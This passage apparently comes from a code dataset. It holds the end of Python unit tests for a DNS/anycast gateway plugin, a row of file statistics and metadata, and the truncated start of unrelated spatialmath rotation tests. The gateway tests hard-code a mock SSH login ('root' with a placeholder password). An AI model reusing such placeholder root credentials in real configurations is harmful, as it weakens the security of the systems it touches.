from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import create_deployment_roles # pylint:disable=import-error
actual = create_deployment_roles(
server_name, server_id, config_id, view_name, role_type, properties)
expected = False
self.assertEqual(expected, actual)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_create_deployment_roles_successfully(self, mock_g):
# pylint: disable=missing-docstring
configuration = mock.Mock()
mock_g.user.get_api.return_value.get_entity_by_id.return_value = configuration
server_id = 334498
server_nsf = {
"id": 111
}
mock_g.user.get_api.return_value._api_client.service.getEntityByName.return_value = server_nsf
server_name = "bdds169"
config_id = 102728
view_name = "default"
role_type = "SLAVE_STEALTH"
properties = ""
role_id = 111
mock_g.user.get_api.return_value._api_client.service.addDNSDeploymentRole.return_value = role_id
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import create_deployment_roles # pylint:disable=import-error
actual = create_deployment_roles(
server_name, server_id, config_id, view_name, role_type, properties)
expected = role_id
self.assertEqual(expected, actual)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_create_deployment_roles_with_none_server_id(self, mock_g):
# pylint: disable=missing-docstring
configuration = mock.Mock()
mock_g.user.get_api.return_value.get_entity_by_id.return_value = configuration
server_id = None
server_obj = {
"id": 334498,
"name": "bdds169",
"type": "Server",
"properties": "defaultInterfaceAddress=192.168.88.169|servicesIPv4Address=192.168.89.169|servicesIPv6Address=FDAC:1400:1::20|fullHostName=bdds169|profile=DNS_DHCP_INTEGRITY_BRANCH|"
}
mock_g.user.get_api.return_value._api_client.service.getEntityByName.return_value = server_obj
server_nsf = {
"id": 111
}
mock_g.user.get_api.return_value._api_client.service.getEntityByName.return_value = server_nsf
server_name = "bdds169"
config_id = 102728
view_name = "default"
role_type = "SLAVE_STEALTH"
properties = ""
mock_g.user.get_api.return_value._api_client.service.addDNSDeploymentRole.return_value = None
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import create_deployment_roles # pylint:disable=import-error
actual = create_deployment_roles(
server_name, server_id, config_id, view_name, role_type, properties)
expected = False
self.assertEqual(expected, actual)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.WebFault', Exception)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_create_deployment_roles_with_webfault_exception(self, mock_g):
# pylint: disable=missing-docstring
configuration = mock.Mock()
mock_g.user.get_api.return_value.get_entity_by_id.return_value = configuration
mock_g.user.get_api.return_value._api_client.service.getEntityByName.side_effect = Exception(
"exception")
server_name = "bdds169"
server_id = 334498
config_id = 102728
view_name = "default"
role_type = "SLAVE_STEALTH"
properties = ""
mock_g.user.get_api.return_value._api_client.service.addDNSDeploymentRole.side_effect = Exception(
"exception")
mock_g.user.logger.error.side_effect = Exception("exception")
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import create_deployment_roles # pylint:disable=import-error
with self.assertRaises(Exception):
actual = create_deployment_roles(
server_name, server_id, config_id, view_name, role_type, properties)
expected = False
self.assertEqual(expected, actual)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.PortalException', Exception)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_create_deployment_roles_with_portal_exception(self, mock_g):
# pylint: disable=missing-docstring
mock_g.user.get_api.return_value.get_entity_by_id.side_effect = Exception(
"exception")
mock_g.user.logger.warning.side_effect = Exception("exception")
server_name = "bdds169"
server_id = 334498
config_id = 102728
view_name = "default"
role_type = "SLAVE_STEALTH"
properties = ""
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import create_deployment_roles # pylint:disable=import-error
with self.assertRaises(Exception):
actual = create_deployment_roles(
server_name, server_id, config_id, view_name, role_type, properties)
expected = False
self.assertEqual(expected, actual)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_get_list_servers(self, mock_g):
# pylint: disable=missing-docstring
list_server = [{
"id": 334498,
"name": "bdds169",
"type": "Server",
"properties": "defaultInterfaceAddress=192.168.88.169|servicesIPv4Address=192.168.89.169|servicesIPv6Address=FDAC:1400:1::20|fullHostName=bdds169|profile=DNS_DHCP_INTEGRITY_BRANCH|"
}, {
"id": 332454,
"name": "bdds141",
"type": "Server",
"properties": "defaultInterfaceAddress=192.168.88.169|servicesIPv4Address=192.168.89.169|servicesIPv6Address=FDAC:1400:1::20|fullHostName=bdds169|profile=DNS_DHCP_INTEGRITY_BRANCH|"
}]
configuration_id = 102728
mock_g.user.get_api.return_value._api_client.service.getEntities.return_value = list_server
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import get_list_servers # pylint:disable=import-error
actual = get_list_servers(configuration_id)
expected = list_server
self.assertEqual(expected, actual)
mock_g.user.get_api.return_value._api_client.service.getEntities.assert_called_once()
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.read_config_json_file')
def test_get_memcached_config(self, mock_read_config_json_file):
# pylint: disable=missing-docstring
data_config = {
"sync_interval": 1,
"memcached_host": "192.168.88.170",
"memcached_port": 11211,
"k1_api": {
"address": "192.168.88.161",
"port": 5555,
"uri": "/api/v1.0/srvo/instances/realtime_load"
}
}
mock_read_config_json_file.return_value = data_config
memcached_host = "192.168.88.170"
memcached_port = 11211
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import get_memcached_config # pylint:disable=import-error
actual = get_memcached_config()
expected = memcached_host, int(memcached_port)
self.assertEqual(expected, actual)
mock_read_config_json_file.assert_called_once()
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.read_config_json_file')
def test_get_memcached_config_with_exception(self, mock_read_config_json_file):
# pylint: disable=missing-docstring
data_config = {}
mock_read_config_json_file.return_value = data_config
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import get_memcached_config # pylint:disable=import-error
with self.assertRaises(Exception):
get_memcached_config()
mock_read_config_json_file.assert_called_once()
def test_deploy_server_config_true(self):
# pylint: disable=missing-docstring
server_id = 334498
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import deploy_server_config # pylint:disable=import-error
actual = deploy_server_config(server_id)
expect = True
self.assertEqual(actual, expect)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.WebFault', Exception)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_deploy_server_config_false(self, mock_g):
# pylint: disable=missing-docstring
server_id = 334498
mock_g.user.get_api.return_value._api_client.service.deployServerConfig.side_effect = Exception(
"exception")
mock_g.user.logger.error.side_effect = Exception("exception")
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import deploy_server_config # pylint:disable=import-error
with self.assertRaises(Exception):
actual = deploy_server_config(server_id)
expect = False
self.assertEqual(actual, expect)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.WebFault', Exception)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_wait_for_deployment_fail_with_web_default(self, mock_g):
# pylint: disable=missing-docstring
status = None
mock_g.user.get_api.return_value._api_client.service.getServerDeploymentStatus.return_value = status
server_id = "334498"
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import wait_for_deployment # pylint:disable=import-error
with self.assertRaises(Exception):
actual = wait_for_deployment(server_id)
expect = False
self.assertEqual(actual, expect)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_wait_for_deployment_successfully(self, mock_g):
# pylint: disable=missing-docstring
status = 2
mock_g.user.get_api.return_value._api_client.service.getServerDeploymentStatus.return_value = status
server_id = "334498"
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import wait_for_deployment # pylint:disable=import-error
actual = wait_for_deployment(server_id)
expect = status
self.assertEqual(actual, expect)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_wait_for_deployment_with_big_count(self, mock_g):
"""
:param mock_g:
:return:
"""
status = 9
mock_g.user.get_api.return_value._api_client.service.getServerDeploymentStatus.return_value = status
server_id = "334498"
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import wait_for_deployment # pylint:disable=import-error
actual = wait_for_deployment(server_id)
expect = status
self.assertEqual(actual, expect)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.WebFault', Exception)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_wait_for_deployment_fail_with_status_not_in_list(self, mock_g):
# pylint: disable=missing-docstring
mock_g.user.get_api.return_value._api_client.service.getServerDeploymentStatus.side_effect = Exception(
"exception")
server_id = "334498"
result = False
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import wait_for_deployment # pylint:disable=import-error
actual = wait_for_deployment(server_id)
expect = result
self.assertEqual(actual, expect)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.run_ssh_cmd')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.set')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.re')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.run_psmclient_cmd')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.process_password')
def test_configure_anycast_with_protocol_ospfd_and_ipv6(self, mock_process_password, mock_run_psmclient_cmd,
mock_re, mock_set, mock_run_ssh_cmd):
# pylint: disable=missing-docstring
mock_process_password.decrypt_password = mock.Mock()
server_ip = "192.168.88.169"
username = "root"
server_ipv6 = "FDAC:1400:1::20"
pwd = "d8e8fca"
anycast_config = {
"anycast_protocol": "ospfd",
"anycast_ipv4": "192.18.88.169",
"anycast_ipv6": "FDAC:1400:1::20",
"ospf_authenticate": "nhii",
"ospf_dead_interval": "",
"ospf_hello_interval": "",
"ospf_password": "",
"ospf_area": "nhii",
"ospf_stub": "123",
"ospfv3_hello_interval": "",
"ospfv3_dead_interval": "",
"ospfv3_area": "",
"ospfv3_range": ""
}
m = mock.Mock() # pylint:disable=invalid-name
mock_re.match.return_value = m
psm_overrides = {'anycast', 'nhiii'}
mock_set.return_value = psm_overrides
output, error = "nhiii", "info"
mock_run_ssh_cmd.return_value = output, error
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import configure_anycast # pylint:disable=import-error
configure_anycast(server_ip, server_ipv6,
username, pwd, anycast_config)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.run_ssh_cmd')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.set')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.re')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.run_psmclient_cmd')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.process_password')
def test_configure_anycast_with_protocol_ospfd_and_ipv4(self, mock_process_password, mock_run_psmclient_cmd,
mock_re, mock_set, mock_run_ssh_cmd):
# pylint: disable=missing-docstring
mock_process_password.decrypt_password = mock.Mock()
server_ip = "192.168.88.169"
username = "root"
server_ipv6 = None
pwd = "d8e8fca"
anycast_config = {
"anycast_protocol": "ospfd",
"anycast_ipv4": "192.18.88.169",
"anycast_ipv6": "FDAC:1400:1::20",
"ospf_authenticate": "nhii",
"ospf_dead_interval": "",
"ospf_hello_interval": "",
"ospf_password": "",
"ospf_area": "nhii",
"ospf_stub": "123",
"ospfv3_hello_interval": "",
"ospfv3_dead_interval": "",
"ospfv3_area": "",
"ospfv3_range": ""
}
m = mock.Mock() # pylint:disable=invalid-name
mock_re.match.return_value = m
psm_overrides = {'anycast', 'nhiii'}
mock_set.return_value = psm_overrides
output, error = "nhiii", "info"
mock_run_ssh_cmd.return_value = output, error
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import configure_anycast # pylint:disable=import-error
configure_anycast(server_ip, server_ipv6,
username, pwd, anycast_config)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.run_ssh_cmd')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.set')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.re')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.run_psmclient_cmd')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.process_password')
def test_configure_anycast_with_protocol_bgp(self, mock_process_password, mock_run_psmclient_cmd,
mock_re, mock_set, mock_run_ssh_cmd):
# pylint: disable=missing-docstring
mock_process_password.decrypt_password = mock.Mock()
server_ip = "192.168.88.169"
username = "root"
server_ipv6 = "FDAC:1400:1::20"
pwd = "d8e8fca"
anycast_config = {
"anycast_protocol": "bgp",
"anycast_ipv4": "192.18.88.169",
"anycast_ipv6": "FDAC:1400:1::20",
"prefix_lists": None,
"bgp_local_asn": "nhii",
"bgp_telnet_password": "",
"bgp_keepalive_time": "",
"bgp_command_line_interface": "",
"bgp_hold_time": "",
"bgp_ipv6_address": "",
"bgp_ipv4_address": "",
"bgp_remote_asn_in_ipv4": "",
"bgp_ipv4_hop_limit": "",
"bgp_next_hop_self_ipv4": "",
"bgp_md5_ipv4": "",
"bgp_remote_asn_in_ipv6": "",
"bgp_ipv6_hop_limit": "",
"bgp_next_hop_self_ipv6": "",
"bgp_md5_ipv6": "",
}
m = mock.Mock() # pylint:disable=invalid-name
mock_re.match.return_value = m
psm_overrides = {'anycast', 'nhiii'}
mock_set.return_value = psm_overrides
output, error = "nhiii", "info"
mock_run_ssh_cmd.return_value = output, error
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import configure_anycast # pylint:disable=import-error
configure_anycast(server_ip, server_ipv6,
username, pwd, anycast_config)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.run_ssh_cmd')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.set')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.re')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.run_psmclient_cmd')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.process_password')
def test_configure_anycast_with_protocol_rip(self, mock_process_password, mock_run_psmclient_cmd,
mock_re, mock_set, mock_run_ssh_cmd):
# pylint: disable=missing-docstring
mock_process_password.decrypt_password = mock.Mock()
server_ip = "192.168.88.169"
username = "root"
server_ipv6 = "FDAC:1400:1::20"
pwd = "d8e8fca"
anycast_config = {
"anycast_protocol": "rip",
"anycast_ipv4": "192.18.88.169",
"anycast_ipv6": "FDAC:1400:1::20",
"prefix_lists": None,
"rip_authenticate": "nhii",
"rip_password": "",
}
m = mock.Mock() # pylint:disable=invalid-name
mock_re.match.return_value = m
psm_overrides = {'anycast', 'nhiii'}
mock_set.return_value = psm_overrides
output, error = "nhiii", "info"
mock_run_ssh_cmd.return_value = output, error
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import configure_anycast # pylint:disable=import-error
configure_anycast(server_ip, server_ipv6,
username, pwd, anycast_config)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.run_ssh_cmd')
def test_run_psmclient_cmd_with_output_ok(self, mock_run_ssh_cmd):
# pylint: disable=missing-docstring
output, error = b'retcode=ok', b''
mock_run_ssh_cmd.return_value = output, error
server_ip = "192.168.88.169"
username = "root"
password = "d8e8fca"
cmd = ""
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import run_psmclient_cmd # pylint:disable=import-error
actual = run_psmclient_cmd(server_ip, username, password, cmd)
expect = output
self.assertEqual(actual, expect)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.run_ssh_cmd')
def test_run_psmclient_not_ok(self, mock_run_ssh_cmd):
# pylint: disable=missing-docstring
output, error = b'retcode=false', b''
mock_run_ssh_cmd.return_value = output, error
server_ip = "192.168.88.169"
username = "root"
password = "d8e8fca"
cmd = ""
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import run_psmclient_cmd # pylint:disable=import-error
actual = run_psmclient_cmd(server_ip, username, password, cmd)
expect = output
self.assertEqual(actual, expect)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.socket')
def test_cidr_to_netmask(self, mock_socket):
# pylint: disable=missing-docstring
net_bits = 24
mock_socket.inet_ntoa.return_value = "255.255.255.0"
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import cidr_to_netmask # pylint:disable=import-error
actual = cidr_to_netmask(net_bits)
expect = "255.255.255.0"
self.assertEqual(actual, expect)
if __name__ == "__main__":
unittest.main()
| 52.595376 | 195 | 0.695804 | 8,409 | 72,792 | 5.624331 | 0.041027 | 0.093245 | 0.074765 | 0.148853 | 0.946485 | 0.941981 | 0.937224 | 0.93291 | 0.923967 | 0.913077 | 0 | 0.0311 | 0.213279 | 72,792 | 1,383 | 196 | 52.633406 | 0.794768 | 0.056174 | 0 | 0.810137 | 0 | 0.007241 | 0.293137 | 0.211452 | 0 | 0 | 0 | 0 | 0.062751 | 1 | 0.042639 | false | 0.06436 | 0.045857 | 0 | 0.0893 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
5a7d1a51e5fdbb99b9d38568a2569ad0f4566423 | 27,589 | py | Python | tests/base/test_transforms3d.py | dbkmgm/spatialmath-python | 8d48e5a21334f9ceac4f549f194c79afaa22a5d7 | [
"MIT"
] | null | null | null | tests/base/test_transforms3d.py | dbkmgm/spatialmath-python | 8d48e5a21334f9ceac4f549f194c79afaa22a5d7 | [
"MIT"
] | null | null | null | tests/base/test_transforms3d.py | dbkmgm/spatialmath-python | 8d48e5a21334f9ceac4f549f194c79afaa22a5d7 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Apr 10 14:19:04 2020
@author: corkep
"""
import numpy as np
import numpy.testing as nt
import unittest
from math import pi
import math
from scipy.linalg import logm, expm
from spatialmath.base.transforms3d import *
from spatialmath.base.transformsNd import isR, t2r, r2t, rt2tr
class Test3D(unittest.TestCase):
def test_checks(self):
# 2D case, with rotation matrix
R = np.eye(2)
nt.assert_equal(isR(R), True)
nt.assert_equal(isrot(R), False)
nt.assert_equal(ishom(R), False)
nt.assert_equal(isrot(R, True), False)
nt.assert_equal(ishom(R, True), False)
# 2D case, invalid rotation matrix
R = np.array([[1, 1], [0, 1]])
nt.assert_equal(isR(R), False)
nt.assert_equal(isrot(R), False)
nt.assert_equal(ishom(R), False)
nt.assert_equal(isrot(R, True), False)
nt.assert_equal(ishom(R, True), False)
# 2D case, with homogeneous transformation matrix
T = np.array([[1, 0, 3], [0, 1, 4], [0, 0, 1]])
nt.assert_equal(isR(T), False)
nt.assert_equal(isrot(T), True)
nt.assert_equal(ishom(T), False)
nt.assert_equal(isrot(T, True), False)
nt.assert_equal(ishom(T, True), False)
# 2D case, invalid rotation matrix
T = np.array([[1, 1, 3], [0, 1, 4], [0, 0, 1]])
nt.assert_equal(isR(T), False)
nt.assert_equal(isrot(T), True)
nt.assert_equal(ishom(T), False)
nt.assert_equal(isrot(T, True), False)
nt.assert_equal(ishom(T, True), False)
# 2D case, invalid bottom row
T = np.array([[1, 1, 3], [0, 1, 4], [9, 0, 1]])
nt.assert_equal(isR(T), False)
nt.assert_equal(isrot(T), True)
nt.assert_equal(ishom(T), False)
nt.assert_equal(isrot(T, True), False)
nt.assert_equal(ishom(T, True), False)
def test_trinv(self):
T = np.eye(4)
nt.assert_array_almost_equal(trinv(T), T)
T = trotx(0.3)
nt.assert_array_almost_equal(trinv(T) @ T, np.eye(4))
T = transl(1, 2, 3)
nt.assert_array_almost_equal(trinv(T) @ T, np.eye(4))
def test_rotx(self):
R = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
nt.assert_array_almost_equal(rotx(0), R)
nt.assert_array_almost_equal(rotx(0, unit="rad"), R)
nt.assert_array_almost_equal(rotx(0, unit="deg"), R)
nt.assert_array_almost_equal(rotx(0, "deg"), R)
nt.assert_almost_equal(np.linalg.det(rotx(0)), 1)
R = np.array([[1, 0, 0], [0, 0, -1], [0, 1, 0]])
nt.assert_array_almost_equal(rotx(pi / 2), R)
nt.assert_array_almost_equal(rotx(pi / 2, unit="rad"), R)
nt.assert_array_almost_equal(rotx(90, unit="deg"), R)
nt.assert_array_almost_equal(rotx(90, "deg"), R)
nt.assert_almost_equal(np.linalg.det(rotx(pi / 2)), 1)
R = np.array([[1, 0, 0], [0, -1, 0], [0, 0, -1]])
nt.assert_array_almost_equal(rotx(pi), R)
nt.assert_array_almost_equal(rotx(pi, unit="rad"), R)
nt.assert_array_almost_equal(rotx(180, unit="deg"), R)
nt.assert_array_almost_equal(rotx(180, "deg"), R)
nt.assert_almost_equal(np.linalg.det(rotx(pi)), 1)
def test_roty(self):
R = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
nt.assert_array_almost_equal(roty(0), R)
nt.assert_array_almost_equal(roty(0, unit="rad"), R)
nt.assert_array_almost_equal(roty(0, unit="deg"), R)
nt.assert_array_almost_equal(roty(0, "deg"), R)
nt.assert_almost_equal(np.linalg.det(roty(0)), 1)
R = np.array([[0, 0, 1], [0, 1, 0], [-1, 0, 0]])
nt.assert_array_almost_equal(roty(pi / 2), R)
nt.assert_array_almost_equal(roty(pi / 2, unit="rad"), R)
nt.assert_array_almost_equal(roty(90, unit="deg"), R)
nt.assert_array_almost_equal(roty(90, "deg"), R)
nt.assert_almost_equal(np.linalg.det(roty(pi / 2)), 1)
R = np.array([[-1, 0, 0], [0, 1, 0], [0, 0, -1]])
nt.assert_array_almost_equal(roty(pi), R)
nt.assert_array_almost_equal(roty(pi, unit="rad"), R)
nt.assert_array_almost_equal(roty(180, unit="deg"), R)
nt.assert_array_almost_equal(roty(180, "deg"), R)
nt.assert_almost_equal(np.linalg.det(roty(pi)), 1)
def test_rotz(self):
R = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
nt.assert_array_almost_equal(rotz(0), R)
nt.assert_array_almost_equal(rotz(0, unit="rad"), R)
nt.assert_array_almost_equal(rotz(0, unit="deg"), R)
nt.assert_array_almost_equal(rotz(0, "deg"), R)
nt.assert_almost_equal(np.linalg.det(rotz(0)), 1)
R = np.array([[0, -1, 0], [1, 0, 0], [0, 0, 1]])
nt.assert_array_almost_equal(rotz(pi / 2), R)
nt.assert_array_almost_equal(rotz(pi / 2, unit="rad"), R)
nt.assert_array_almost_equal(rotz(90, unit="deg"), R)
nt.assert_array_almost_equal(rotz(90, "deg"), R)
nt.assert_almost_equal(np.linalg.det(rotz(pi / 2)), 1)
R = np.array([[-1, 0, 0], [0, -1, 0], [0, 0, 1]])
nt.assert_array_almost_equal(rotz(pi), R)
nt.assert_array_almost_equal(rotz(pi, unit="rad"), R)
nt.assert_array_almost_equal(rotz(180, unit="deg"), R)
nt.assert_array_almost_equal(rotz(180, "deg"), R)
nt.assert_almost_equal(np.linalg.det(rotz(pi)), 1)
def test_trotX(self):
T = np.array([[1, 0, 0, 3], [0, 0, -1, 4], [0, 1, 0, 5], [0, 0, 0, 1]])
nt.assert_array_almost_equal(trotx(pi / 2, t=[3, 4, 5]), T)
nt.assert_array_almost_equal(trotx(pi / 2, t=(3, 4, 5)), T)
nt.assert_array_almost_equal(trotx(pi / 2, t=np.array([3, 4, 5])), T)
T = np.array([[0, 0, 1, 3], [0, 1, 0, 4], [-1, 0, 0, 5], [0, 0, 0, 1]])
nt.assert_array_almost_equal(troty(pi / 2, t=[3, 4, 5]), T)
nt.assert_array_almost_equal(troty(pi / 2, t=(3, 4, 5)), T)
nt.assert_array_almost_equal(troty(pi / 2, t=np.array([3, 4, 5])), T)
T = np.array([[0, -1, 0, 3], [1, 0, 0, 4], [0, 0, 1, 5], [0, 0, 0, 1]])
nt.assert_array_almost_equal(trotz(pi / 2, t=[3, 4, 5]), T)
nt.assert_array_almost_equal(trotz(pi / 2, t=(3, 4, 5)), T)
nt.assert_array_almost_equal(trotz(pi / 2, t=np.array([3, 4, 5])), T)
def test_rpy2r(self):
r2d = 180 / pi
# default zyx order
R = rotz(0.3) @ roty(0.2) @ rotx(0.1)
nt.assert_array_almost_equal(rpy2r(0.1, 0.2, 0.3), R)
nt.assert_array_almost_equal(rpy2r([0.1, 0.2, 0.3]), R)
nt.assert_array_almost_equal(
rpy2r(0.1 * r2d, 0.2 * r2d, 0.3 * r2d, unit="deg"), R
)
nt.assert_array_almost_equal(
rpy2r([0.1 * r2d, 0.2 * r2d, 0.3 * r2d], unit="deg"), R
)
# xyz order
R = rotx(0.3) @ roty(0.2) @ rotz(0.1)
nt.assert_array_almost_equal(rpy2r(0.1, 0.2, 0.3, order="xyz"), R)
nt.assert_array_almost_equal(rpy2r([0.1, 0.2, 0.3], order="xyz"), R)
nt.assert_array_almost_equal(
rpy2r(0.1 * r2d, 0.2 * r2d, 0.3 * r2d, unit="deg", order="xyz"), R
)
nt.assert_array_almost_equal(
rpy2r([0.1 * r2d, 0.2 * r2d, 0.3 * r2d], unit="deg", order="xyz"), R
)
# yxz order
R = roty(0.3) @ rotx(0.2) @ rotz(0.1)
nt.assert_array_almost_equal(rpy2r(0.1, 0.2, 0.3, order="yxz"), R)
nt.assert_array_almost_equal(rpy2r([0.1, 0.2, 0.3], order="yxz"), R)
nt.assert_array_almost_equal(
rpy2r(0.1 * r2d, 0.2 * r2d, 0.3 * r2d, unit="deg", order="yxz"), R
)
nt.assert_array_almost_equal(
rpy2r([0.1 * r2d, 0.2 * r2d, 0.3 * r2d], unit="deg", order="yxz"), R
)
def test_rpy2tr(self):
r2d = 180 / pi
# default zyx order
T = trotz(0.3) @ troty(0.2) @ trotx(0.1)
nt.assert_array_almost_equal(rpy2tr(0.1, 0.2, 0.3), T)
nt.assert_array_almost_equal(rpy2tr([0.1, 0.2, 0.3]), T)
nt.assert_array_almost_equal(
rpy2tr(0.1 * r2d, 0.2 * r2d, 0.3 * r2d, unit="deg"), T
)
nt.assert_array_almost_equal(
rpy2tr([0.1 * r2d, 0.2 * r2d, 0.3 * r2d], unit="deg"), T
)
# xyz order
T = trotx(0.3) @ troty(0.2) @ trotz(0.1)
nt.assert_array_almost_equal(rpy2tr(0.1, 0.2, 0.3, order="xyz"), T)
nt.assert_array_almost_equal(rpy2tr([0.1, 0.2, 0.3], order="xyz"), T)
nt.assert_array_almost_equal(
rpy2tr(0.1 * r2d, 0.2 * r2d, 0.3 * r2d, unit="deg", order="xyz"), T
)
nt.assert_array_almost_equal(
rpy2tr([0.1 * r2d, 0.2 * r2d, 0.3 * r2d], unit="deg", order="xyz"), T
)
# yxz order
T = troty(0.3) @ trotx(0.2) @ trotz(0.1)
nt.assert_array_almost_equal(rpy2tr(0.1, 0.2, 0.3, order="yxz"), T)
nt.assert_array_almost_equal(rpy2tr([0.1, 0.2, 0.3], order="yxz"), T)
nt.assert_array_almost_equal(
rpy2tr(0.1 * r2d, 0.2 * r2d, 0.3 * r2d, unit="deg", order="yxz"), T
)
nt.assert_array_almost_equal(
rpy2tr([0.1 * r2d, 0.2 * r2d, 0.3 * r2d], unit="deg", order="yxz"), T
)
def test_eul2r(self):
r2d = 180 / pi
# default zyx order
R = rotz(0.1) @ roty(0.2) @ rotz(0.3)
nt.assert_array_almost_equal(eul2r(0.1, 0.2, 0.3), R)
nt.assert_array_almost_equal(eul2r([0.1, 0.2, 0.3]), R)
nt.assert_array_almost_equal(
eul2r(0.1 * r2d, 0.2 * r2d, 0.3 * r2d, unit="deg"), R
)
nt.assert_array_almost_equal(
eul2r([0.1 * r2d, 0.2 * r2d, 0.3 * r2d], unit="deg"), R
)
def test_eul2tr(self):
r2d = 180 / pi
# default zyx order
T = trotz(0.1) @ troty(0.2) @ trotz(0.3)
nt.assert_array_almost_equal(eul2tr(0.1, 0.2, 0.3), T)
nt.assert_array_almost_equal(eul2tr([0.1, 0.2, 0.3]), T)
nt.assert_array_almost_equal(
eul2tr(0.1 * r2d, 0.2 * r2d, 0.3 * r2d, unit="deg"), T
)
nt.assert_array_almost_equal(
eul2tr([0.1 * r2d, 0.2 * r2d, 0.3 * r2d], unit="deg"), T
)
def test_angvec2r(self):
r2d = 180 / pi
nt.assert_array_almost_equal(angvec2r(0, [1, 0, 0]), rotx(0))
nt.assert_array_almost_equal(angvec2r(pi / 4, [1, 0, 0]), rotx(pi / 4))
nt.assert_array_almost_equal(angvec2r(-pi / 4, [1, 0, 0]), rotx(-pi / 4))
nt.assert_array_almost_equal(angvec2r(0, [0, 1, 0]), roty(0))
nt.assert_array_almost_equal(angvec2r(pi / 4, [0, 1, 0]), roty(pi / 4))
nt.assert_array_almost_equal(angvec2r(-pi / 4, [0, 1, 0]), roty(-pi / 4))
nt.assert_array_almost_equal(angvec2r(0, [0, 0, 1]), rotz(0))
nt.assert_array_almost_equal(angvec2r(pi / 4, [0, 0, 1]), rotz(pi / 4))
nt.assert_array_almost_equal(angvec2r(-pi / 4, [0, 0, 1]), rotz(-pi / 4))
def test_angvec2tr(self):
r2d = 180 / pi
